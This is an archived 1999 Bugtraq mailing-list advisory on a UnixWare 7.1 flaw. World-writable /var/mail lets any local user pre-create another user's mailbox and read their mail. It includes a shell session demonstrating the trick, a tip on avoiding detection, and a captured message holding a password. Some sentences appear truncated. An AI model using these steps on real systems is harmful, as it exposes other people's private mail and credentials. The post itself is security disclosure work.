Home page logo

bugtraq logo Bugtraq mailing list archives

UnixWare read/modify users' mail
From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:03:43 MST


Any user can read/modify others' mail.

Only UnixWare 7.1 was tested.

Imagine my suprise when I saw that /var/mail was mode 777.  As such, any
user may create a file called /var/mail/<username> with a mode readable by
him and trap all incoming mail.  Afraid of getting caught? chown the file
to <username> (see my advisory on this subject), leaving it still
world-readable, and no one will ever know who did it.  

All of this assumes, of course, that the user has not recieved any mail
yet.  If you keep track of your /etc/passwd file, you can monitor for new
entries and create the files as needed.

This permissions problem obviously opens the door for all sorts of
problems with symlinks and such.  I would imagine that some mail delivery
programs which aren't as smart as sendmail will follow symlinks in

And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG

bash-2.02$ cat /usr/bin/mail
cat > /dev/null
exit 0



bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other             0 Dec  4 07:54 btellier

Now wait for btellier to get some mail...

bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other           410 Dec  4 07:55 btellier
bash-2.02$ cat btellier
Fromroot Sat Dec  4 07:55:29 1999
Return-Path: root
Received: (from root () localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root () localhost
Message-Id: <199912041355.HAA04842 () localhost>
Content-Length: 52

your ueber-secure password on 0wned.com is a () f9;se0

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

Get free email and a permanent address at http://www.netaddress.com/?N=1

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]